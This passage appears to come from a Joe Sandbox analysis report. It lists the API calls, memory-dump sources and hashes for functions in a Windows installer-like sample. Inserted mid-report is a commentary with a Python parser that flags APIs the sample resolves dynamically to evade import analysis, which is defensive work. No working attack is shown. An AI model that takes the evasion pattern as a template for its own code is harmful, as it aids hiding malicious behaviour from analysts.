• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: ShutdownBlockReasonDestroy$user32.dll
• API String ID: 1646373207-260599015
• Opcode ID: ea69c1903bbb3952bc51afe47cebbdaeff40ebefb6d83304b24a691856bce627
• Instruction ID: 186c8a8b24504359f9bd95d8817b94a00a7cf61d77d8ea7090d5fad6c77db3b3
• Opcode Fuzzy Hash: ea69c1903bbb3952bc51afe47cebbdaeff40ebefb6d83304b24a691856bce627
• Instruction Fuzzy Hash: 1CD0C792312732666D10F1F73CD1DBB098C89116753544477F505E5241D55DDD01196D
APIs
• GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004985C2), ref: 0044F78F
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F795
Strings
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: NotifyWinEvent$user32.dll
• API String ID: 1646373207-597752486
• Opcode ID: ae93fc19694d9525260dce27dd3aecea032003b0c05c01207aef2e00a83e3bcb
• Instruction ID: adaf68bc035e952e092e397114f6a1653fed54d9058db7208dfb757fc5d15743
• Opcode Fuzzy Hash: ae93fc19694d9525260dce27dd3aecea032003b0c05c01207aef2e00a83e3bcb
• Instruction Fuzzy Hash: F7E012F4E417049DEF00BBF5BA86B1E3A90E764718B01417FF404A62A2DB7C440C8E5D
APIs
• GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498618,00000001,00000000,0049863C), ref: 00498342
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498348
Strings
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: DisableProcessWindowsGhosting$user32.dll
• API String ID: 1646373207-834958232
• Opcode ID: a3044ebe087eacdbfcba4854d25501df4a36c2cbac561551b3a8e0a3d6241fb5
• Instruction ID: 7eda4cb16e2cba450c320cc229382d7be1fc12bfd2fbc27455de3eb8489cf644
• Opcode Fuzzy Hash: a3044ebe087eacdbfcba4854d25501df4a36c2cbac561551b3a8e0a3d6241fb5
• Instruction Fuzzy Hash: 88B092C128174298AC7032FA0C02A1F08084882F28718083F3C48F50C2CD6ED804182D
APIs
  • Part of subcall function 0044B668: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F785,004985C2), ref: 0044B68F
  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B6A7
  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6B9
  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6CB
  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6DD
  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6EF
  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B701
  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B713
  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B725
  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B737
  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B749
  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B75B
  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B76D
  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B77F
  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B791
  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B7A3
  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7B5
  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7C7
• LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004985EA), ref: 0046496F
• GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464975
Strings
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: SHPathPrepareForWriteA$shell32.dll
• API String ID: 2238633743-2683653824
• Opcode ID: b0b0cc609965775dafbc177cfbf53c5f286fe0b9a785a06f0526f65a81a5d1e8
• Instruction ID: ef62b78e1ecbbf86accf82cc5e54c74759ffbda80f6f2c7107c350d82a6c33f4
• Opcode Fuzzy Hash: b0b0cc609965775dafbc177cfbf53c5f286fe0b9a785a06f0526f65a81a5d1e8
• Instruction Fuzzy Hash: 48B092E06E2700A88E00B7FA2887B0B104895D0B1DB56063F704979092EB7C4008CD6E
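The entries above all follow the same shape: GetModuleHandleA or LoadLibraryA names a DLL and a GetProcAddress call resolves the export at run time, which is what the report's "Contains functionality to dynamically determine API calls" signature refers to. Below is an added example, not Joe Sandbox code and not code from the sample, that parses this function-listing format and lists the (DLL, export) pairs each function resolves, so the result can be compared against the binary's static import table. The section names, bullet layout and argument order it assumes are taken from the entries in this report; the SAMPLE text is constructed from them and trimmed. One quirk worth knowing: the sandbox's stack capture frequently records the export name inside the GetModuleHandleA/LoadLibraryA argument list (e.g. `kernel32.dll,GetSystemWow64DirectoryA,...`) and repeats the DLL name as GetProcAddress's second argument, so the parser scans both call sites rather than trusting GetProcAddress alone.

```python
"""Parse Joe Sandbox function-listing entries and list the imports each function
resolves at run time (LoadLibrary/GetModuleHandle followed by GetProcAddress)."""
import re
from dataclasses import dataclass, field

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
LOADERS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW",
           "GetModuleHandleA", "GetModuleHandleW"}
# "Func.MODULE(args), ref: ADDR" or "Func.MODULE ref: ADDR", optionally prefixed
# with "Part of subcall function ADDR:" as the report prints nested calls.
API_RE = re.compile(r"^(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?"
                    r"([^\s.]+)\.([A-Za-z0-9_]+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)$")
# Identifier-looking argument that is not an 8-digit recorded pointer/value.
SYMBOL_RE = re.compile(r"(?![0-9A-Fa-f]{8}$)[A-Za-z_][A-Za-z0-9_.]*")


@dataclass
class ApiCall:
    function: str
    module: str
    args: list
    ref: str
    subcall_of: "str | None" = None   # callee address for "Part of subcall function" lines


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)   # "Key: value" lines of the other sections


def split_args(s):
    """Split on top-level commas so '00000001(MOVEFILE_REPLACE_EXISTING)' stays whole."""
    out, cur, depth = [], [], 0
    for ch in s:
        if ch == "," and depth == 0:
            out, cur = out + ["".join(cur)], []
        else:
            depth += (ch == "(") - (ch == ")")
            cur.append(ch)
    return out + ["".join(cur)] if cur else out


def parse_entries(text):
    entries, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
            if line == "APIs":               # every entry in this report opens with APIs
                entries.append(FunctionEntry())
            continue
        if not line or not entries or section == "Strings":
            continue                         # blank, tail of an earlier entry, or Strings list
        line = line.lstrip("• ").strip()
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                sub, func, mod, args, ref = m.groups()
                entries[-1].apis.append(ApiCall(func, mod, split_args(args or ""), ref, sub))
            continue
        key, _, value = line.partition(":")
        if key.strip():
            entries[-1].fields[key.strip()] = value.strip()
    return entries


def resolved_exports(entry):
    """(dll, export) pairs the function resolves dynamically: identifier-looking
    arguments of loader and GetProcAddress calls, paired with the last DLL loaded."""
    pairs, dll = {}, None
    for call in entry.apis:
        names = [a for a in call.args if SYMBOL_RE.fullmatch(a)]
        dlls = [a.lower() for a in names if a.lower().endswith(".dll")]
        exports = [a for a in names if not a.lower().endswith(".dll")]
        if call.function in LOADERS:
            dll = dlls[0] if dlls else dll
        elif call.function != "GetProcAddress":
            continue
        for name in exports:
            if dll:
                pairs[(dll, name)] = None    # dict keeps first-seen order, drops duplicates
    return list(pairs)


# Constructed sample: three entries copied from this report and trimmed.
SAMPLE = """\
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B46,00000000), ref: 0042D91A
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D920
Strings
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetSystemWow64DirectoryA$kernel32.dll
APIs
  • Part of subcall function 0044B668: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F785,004985C2), ref: 0044B68F
  • Part of subcall function 0044B668: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B6A7
• LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004985EA), ref: 0046496F
• GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464975
APIs
  • Part of subcall function 0042EE40: GetTickCount.KERNEL32 ref: 0042EE46
  • Part of subcall function 0042EC98: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECCD
• GetLastError.KERNEL32(00000000,00475991,?,?,0049C1D0,00000000), ref: 0047587A
"""
```

Running `resolved_exports` over every entry of a full report and diffing the result against the PE import directory gives the list of APIs the sample hides from static import analysis; in the entries above that is GetSystemWow64DirectoryA, ShutdownBlockReasonDestroy, NotifyWinEvent, DisableProcessWindowsGhosting, the uxtheme.dll theme functions and SHPathPrepareForWriteA. The heuristic pairs an export with the most recently loaded DLL, so a function that loads two DLLs before calling GetProcAddress would need the subcall addresses taken into account as well.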
APIs
• FindNextFileA.KERNEL32(000000FF,?,00000000,0047D4A8,?,?,?,?,00000000,0047D5FD,?,?,?,00000000,?,0047D70E), ref: 0047D484
• FindClose.KERNEL32(000000FF,0047D4AF,0047D4A8,?,?,?,?,00000000,0047D5FD,?,?,?,00000000,?,0047D70E,00000000), ref: 0047D4A2
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: Find$CloseFileNext
• String ID:
• API String ID: 2066263336-0
• Opcode ID: b2c7b71d20f6e59f381effc7c5b6ff5d5103613db955826220e612b659a83145
• Instruction ID: 2979fa4f850f67a6d1e6d53d287e6b8f4dfe67a5ddfa55c2aaa4ecb03bfc0e13
• Opcode Fuzzy Hash: b2c7b71d20f6e59f381effc7c5b6ff5d5103613db955826220e612b659a83145
• Instruction Fuzzy Hash: CA812D70D0024DAFDF11DFA5CC55ADFBBB9EF49308F5080AAE808A7291D6399A46CF54
APIs
  • Part of subcall function 0042EE40: GetTickCount.KERNEL32 ref: 0042EE46
  • Part of subcall function 0042EC98: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECCD
• GetLastError.KERNEL32(00000000,00475991,?,?,0049C1D0,00000000), ref: 0047587A
Strings
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: CountErrorFileLastMoveTick
• String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
• API String ID: 2406187244-2685451598
• Opcode ID: 0a1b29da48a0e8fc9cf90d26d5d6551fdd5eac2558fd5f62cf07407676141883
• Instruction ID: 8ae0701305b01ce1bca9537847079d861391bf026d2cb8563746cd807755024f
• Opcode Fuzzy Hash: 0a1b29da48a0e8fc9cf90d26d5d6551fdd5eac2558fd5f62cf07407676141883
• Instruction Fuzzy Hash: BB4166B0A006098FDB10EFA5D882ADE77B5EF48314F60853BE514BB351D7789A058BA9
APIs
• GetDesktopWindow.USER32 ref: 00413D56
• GetDesktopWindow.USER32 ref: 00413E0E
  • Part of subcall function 00418ED0: 6F58C6F0.COMCTL32(?,00000000,00413FD3,00000000,004140E3,?,?,0049B628), ref: 00418EEC
  • Part of subcall function 00418ED0: ShowCursor.USER32(00000001,?,00000000,00413FD3,00000000,004140E3,?,?,0049B628), ref: 00418F09
• SetCursor.USER32(00000000,?,?,?,?,00413B03,00000000,00413B16), ref: 00413E4C
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: CursorDesktopWindow$Show
• String ID:
• API String ID: 2074268717-0
• Opcode ID: d2c454668ecaa59f130cbdc0d7f98644b71464a6bea9d144c6b553ceac200a13
• Instruction ID: 95de96b99ba854305cf3f6c98da1fc171ffd9c3687d173b50ed20deed18b133b
• Opcode Fuzzy Hash: d2c454668ecaa59f130cbdc0d7f98644b71464a6bea9d144c6b553ceac200a13
• Instruction Fuzzy Hash: 59411F75600250AFC710DF2AFA85B5677E1EB64319F15817BE404CB365DB38AD81CF98
APIs
• GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A7D
• LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AEC
• LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B87
• MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BC6
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LoadString$FileMessageModuleName
                                                                                                      • String ID:
                                                                                                      • API String ID: 704749118-0
                                                                                                      • Opcode ID: 951c1155a055777031086f0b90c3083af3c2960daf331f13f5541ebbba7c3e7d
                                                                                                      • Instruction ID: 11344639af0fa1b95b6fef638a25282c94d515b30ba3ed4b3402aedba36e13da
                                                                                                      • Opcode Fuzzy Hash: 951c1155a055777031086f0b90c3083af3c2960daf331f13f5541ebbba7c3e7d
                                                                                                      • Instruction Fuzzy Hash: 843133706083849ED330EA658945B9F77D89B85304F40483FF6C8D72D1DB79A9048B67
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E91D
                                                                                                        • Part of subcall function 0044CF60: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF92
                                                                                                      • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E9A1
                                                                                                        • Part of subcall function 0042BBC4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBD8
                                                                                                      • IsRectEmpty.USER32(?), ref: 0044E963
                                                                                                      • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E986
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 855768636-0
                                                                                                      • Opcode ID: 919708f5ffdde2f57f521d6641e4cc0e1a287a75e8cdc9711807c6008472dbb9
                                                                                                      • Instruction ID: 03991ef50c1cdc1947edd1d0bf9da16660927dd763c0b41cb42d654f0fd6bbd7
                                                                                                      • Opcode Fuzzy Hash: 919708f5ffdde2f57f521d6641e4cc0e1a287a75e8cdc9711807c6008472dbb9
                                                                                                      • Instruction Fuzzy Hash: 47113871B5030027E250AA7A9C86B5B76899B88748F14093FB546EB3C7EE7DDC09429D
                                                                                                      APIs
                                                                                                      • OffsetRect.USER32(?,?,00000000), ref: 00495358
                                                                                                      • OffsetRect.USER32(?,00000000,?), ref: 00495373
                                                                                                      • OffsetRect.USER32(?,?,00000000), ref: 0049538D
                                                                                                      • OffsetRect.USER32(?,00000000,?), ref: 004953A8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: OffsetRect
                                                                                                      • String ID:
                                                                                                      • API String ID: 177026234-0
                                                                                                      • Opcode ID: 39b7304c59ecfeab53ef959acea8ec35100b2c2eb9a0585a5ab9f65ef9bb45fe
                                                                                                      • Instruction ID: af1c1dfc71d00ff4a9a929e8d6bf6bfabc08d13bc1b1844b1e7d273cf48c6b2a
                                                                                                      • Opcode Fuzzy Hash: 39b7304c59ecfeab53ef959acea8ec35100b2c2eb9a0585a5ab9f65ef9bb45fe
                                                                                                      • Instruction Fuzzy Hash: 94217CB6700701ABD700DE69CD85E5BB7DEEBC4344F24CA2AF954C7249D634ED0487A6
                                                                                                      APIs
                                                                                                      • GetCursorPos.USER32 ref: 00417270
                                                                                                      • SetCursor.USER32(00000000), ref: 004172B3
                                                                                                      • GetLastActivePopup.USER32(?), ref: 004172DD
                                                                                                      • GetForegroundWindow.USER32(?), ref: 004172E4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1959210111-0
                                                                                                      • Opcode ID: ab2bc15dd938f987afbfcd80c1a154205083a351e68354f3dc1a1c3122339836
                                                                                                      • Instruction ID: a2974bbdd40a4ad71efed6c963999b1e78101043f5dd1c0306289f7dfca9f025
                                                                                                      • Opcode Fuzzy Hash: ab2bc15dd938f987afbfcd80c1a154205083a351e68354f3dc1a1c3122339836
                                                                                                      • Instruction Fuzzy Hash: 4321A1313082018BCB20AB69E985AE733B1EF44754B0545ABF854CB352D73CDC82CB89
                                                                                                      APIs
                                                                                                      • MulDiv.KERNEL32(8B500000,00000008,?), ref: 00494FC1
                                                                                                      • MulDiv.KERNEL32(50142444,00000008,?), ref: 00494FD5
                                                                                                      • MulDiv.KERNEL32(F70577E8,00000008,?), ref: 00494FE9
                                                                                                      • MulDiv.KERNEL32(8BF88BFF,00000008,?), ref: 00495007
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                                      • Instruction ID: c81a7ae82503e1df060b9d2e8e6c822c04bb2cec442f3182d8fec1f0f0e8f71f
                                                                                                      • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                                      • Instruction Fuzzy Hash: 48112472604204ABCF50DE99C8C4D9B7BECEF4D320B1541A6F918DB246D674DD408BA4
                                                                                                      APIs
                                                                                                      • GetClassInfoA.USER32(00400000,0041F480,?), ref: 0041F4B1
                                                                                                      • UnregisterClassA.USER32(0041F480,00400000), ref: 0041F4DA
                                                                                                      • RegisterClassA.USER32(00499598), ref: 0041F4E4
                                                                                                      • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F51F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 4025006896-0
                                                                                                      • Opcode ID: 17400656b2714228e1ab5d36733c826c34e0b7aebe27f437723bcf7a68a21383
                                                                                                      • Instruction ID: e8d232a05c88a2160d81946a52d6ac90de0a8bd7e5396313334bc6410d622602
                                                                                                      • Opcode Fuzzy Hash: 17400656b2714228e1ab5d36733c826c34e0b7aebe27f437723bcf7a68a21383
                                                                                                      • Instruction Fuzzy Hash: 7B011B722401047BDA10EB6DED81E9B3799D719314B11413BBA15E72A1D7369C154BAC
                                                                                                      APIs
                                                                                                      • WaitForInputIdle.USER32(00000001,00000032), ref: 00454F94
                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00454FB6
                                                                                                      • GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00454FC5
                                                                                                      • CloseHandle.KERNEL32(00000001,00454FF2,00454FEB,?,00000031,00000080,00000000,?,?,0045534B,00000080,0000003C,00000000,00455361), ref: 00454FE5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
